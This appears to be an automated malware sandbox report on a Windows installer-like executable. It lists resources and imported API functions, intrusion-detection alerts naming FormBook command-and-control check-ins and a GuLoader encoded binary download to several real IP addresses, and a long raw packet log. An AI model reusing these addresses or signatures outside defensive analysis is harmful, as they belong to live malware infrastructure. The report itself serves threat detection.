                                                                                                                                    RT_ICON0x577400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6512664165103189
                                                                                                                                    RT_ICON0x587e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.6993603411513859
                                                                                                                                    RT_ICON0x596900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7928700361010831
                                                                                                                                    RT_ICON0x59f380x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.526219512195122
                                                                                                                                    RT_ICON0x5a5a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.7247109826589595
                                                                                                                                    RT_ICON0x5ab080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7287234042553191
                                                                                                                                    RT_ICON0x5af700x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.6693548387096774
                                                                                                                                    RT_ICON0x5b2580x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.7128378378378378
                                                                                                                                    RT_DIALOG0x5b3800x100dataEnglishUnited States0.5234375
                                                                                                                                    RT_DIALOG0x5b4800x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                    RT_DIALOG0x5b5a00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                    RT_DIALOG0x5b6680x60dataEnglishUnited States0.7291666666666666
                                                                                                                                    RT_GROUP_ICON0x5b6c80xaedataEnglishUnited States0.6264367816091954
                                                                                                                                    RT_VERSION0x5b7780x24cdataEnglishUnited States0.4812925170068027
                                                                                                                                    RT_MANIFEST0x5b9c80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                                                                                    USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                                                                                    GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States
                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                    192.168.11.20185.104.28.23850022802031412 10/11/23-23:00:16.443832TCP2031412ET TROJAN FormBook CnC Checkin (GET)5002280192.168.11.20185.104.28.238
                                                                                                                                    192.168.11.20104.247.82.9450027802031412 10/11/23-23:02:19.557969TCP2031412ET TROJAN FormBook CnC Checkin (GET)5002780192.168.11.20104.247.82.94
                                                                                                                                    192.168.11.20154.12.93.850020802031412 10/11/23-22:59:35.376043TCP2031412ET TROJAN FormBook CnC Checkin (GET)5002080192.168.11.20154.12.93.8
                                                                                                                                    192.168.11.2052.20.84.6250028802031412 10/11/23-23:02:39.898715TCP2031412ET TROJAN FormBook CnC Checkin (GET)5002880192.168.11.2052.20.84.62
                                                                                                                                    192.168.11.20154.197.227.14250021802031412 10/11/23-22:59:57.794442TCP2031412ET TROJAN FormBook CnC Checkin (GET)5002180192.168.11.20154.197.227.142
                                                                                                                                    192.168.11.2091.195.240.12350015802031412 10/11/23-22:56:51.023724TCP2031412ET TROJAN FormBook CnC Checkin (GET)5001580192.168.11.2091.195.240.123
                                                                                                                                    192.168.11.2034.120.249.18150018802031412 10/11/23-22:58:13.359547TCP2031412ET TROJAN FormBook CnC Checkin (GET)5001880192.168.11.2034.120.249.181
                                                                                                                                    192.168.11.20130.185.109.7750019802031412 10/11/23-22:59:14.631131TCP2031412ET TROJAN FormBook CnC Checkin (GET)5001980192.168.11.20130.185.109.77
                                                                                                                                    192.168.11.2018.119.154.6650025802031412 10/11/23-23:01:17.694616TCP2031412ET TROJAN FormBook CnC Checkin (GET)5002580192.168.11.2018.119.154.66
                                                                                                                                    192.168.11.2034.120.249.18150026802031412 10/11/23-23:02:00.232802TCP2031412ET TROJAN FormBook CnC Checkin (GET)5002680192.168.11.2034.120.249.181
                                                                                                                                    192.168.11.2038.242.133.6150030802031412 10/11/23-23:03:44.695205TCP2031412ET TROJAN FormBook CnC Checkin (GET)5003080192.168.11.2038.242.133.61
                                                                                                                                    192.168.11.20103.72.68.12850012802855192 10/11/23-22:55:50.644822TCP2855192ETPRO TROJAN GuLoader Encoded Binary Request M25001280192.168.11.20103.72.68.128
                                                                                                                                    192.168.11.20104.18.233.4250016802031412 10/11/23-22:57:11.130716TCP2031412ET TROJAN FormBook CnC Checkin (GET)5001680192.168.11.20104.18.233.42
                                                                                                                                    192.168.11.2015.197.142.17350023802031412 10/11/23-23:00:36.461050TCP2031412ET TROJAN FormBook CnC Checkin (GET)5002380192.168.11.2015.197.142.173
                                                                                                                                    192.168.11.20208.91.197.3950024802031412 10/11/23-23:00:57.133284TCP2031412ET TROJAN FormBook CnC Checkin (GET)5002480192.168.11.20208.91.197.39
                                                                                                                                    192.168.11.203.64.163.5050017802031412 10/11/23-22:57:51.976587TCP2031412ET TROJAN FormBook CnC Checkin (GET)5001780192.168.11.203.64.163.50
                                                                                                                                    192.168.11.201.1.1.153908532023883 10/11/23-22:58:12.039557UDP2023883ET DNS Query to a *.top domain - Likely Hostile5390853192.168.11.201.1.1.1
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Oct 11, 2023 22:55:50.280376911 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:50.643551111 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:50.643769026 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:50.644821882 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.007841110 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.007936001 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.007992029 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.008085966 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.008117914 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.008327007 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.008327007 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.369992018 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.370032072 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.370362043 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.370531082 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.370573997 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.370606899 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.370654106 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.370749950 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.370799065 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.370932102 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.370975018 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.371182919 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.371270895 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.371505022 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.732408047 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.732481956 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.732542038 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.732597113 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.732666969 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.732677937 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.732714891 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.732779026 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.732790947 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.732865095 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.732882023 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.732949018 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.733009100 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.733026028 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.733076096 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.733093977 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.733155012 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.733179092 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.733254910 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.733309031 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.733349085 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.733377934 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.733426094 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.733464956 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.733504057 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.733551025 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:51.733664989 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:51.733705997 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.095550060 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.095627069 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.095690012 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.095745087 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.095805883 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.095808029 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.095897913 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.095911026 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.095958948 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.095989943 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096067905 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.096129894 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096196890 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096237898 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.096293926 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096295118 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.096374989 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.096379995 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096457958 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096518993 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096558094 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.096587896 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096610069 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.096677065 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096700907 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.096760988 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096781015 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.096847057 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.096884012 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.096934080 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097027063 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097047091 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.097126007 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.097187042 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.097208977 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097270966 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.097290993 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097359896 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.097378969 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097445965 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.097534895 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097579956 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097596884 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.097664118 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097681046 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.097807884 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097872019 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.097898006 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.097975969 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.098014116 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.098057985 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.098123074 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.098171949 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.098226070 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.098284960 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.098301888 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.098371029 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.098433971 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.098483086 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.098551989 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.098656893 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.458867073 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.458945990 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459007978 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459058046 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459079981 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459125996 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459176064 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459177971 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459254980 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459309101 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459322929 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459357023 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459414005 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459438086 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459501028 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459527969 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459604979 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459616899 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459680080 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459772110 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.459821939 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.459888935 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.460011959 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.460144997 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.460216999 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.460316896 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.460400105 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.460410118 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.460459948 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.460496902 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.460566998 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.460625887 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.460655928 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.460705042 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.460732937 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.460812092 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.460870028 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.460968971 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.460999966 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461025000 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461090088 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461153030 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461153030 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461230040 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461309910 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461361885 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461385012 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461447954 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461513996 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461513996 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461591005 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461630106 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461668015 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461699963 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461760998 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461779118 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461849928 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.461850882 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461956024 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.461999893 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462006092 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.462083101 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462146997 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462151051 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.462227106 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462300062 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.462353945 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.462373018 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462423086 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.462460041 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462527990 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462606907 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.462666988 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462696075 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.462810993 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462814093 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.462891102 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462953091 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.462981939 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463032961 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463047981 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463113070 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463143110 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463198900 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463244915 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463270903 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463294029 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463356972 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463376999 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463452101 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463458061 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463474989 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463505983 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463561058 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463613033 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463660002 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463768959 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463784933 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463886976 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.463922977 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.463964939 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.464040041 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.464055061 CEST5001280192.168.11.20103.72.68.128
                                                                                                                                    Oct 11, 2023 22:55:52.464139938 CEST8050012103.72.68.128192.168.11.20
                                                                                                                                    Oct 11, 2023 22:55:52.464210987 CEST5001280192.168.11.20103.72.68.128
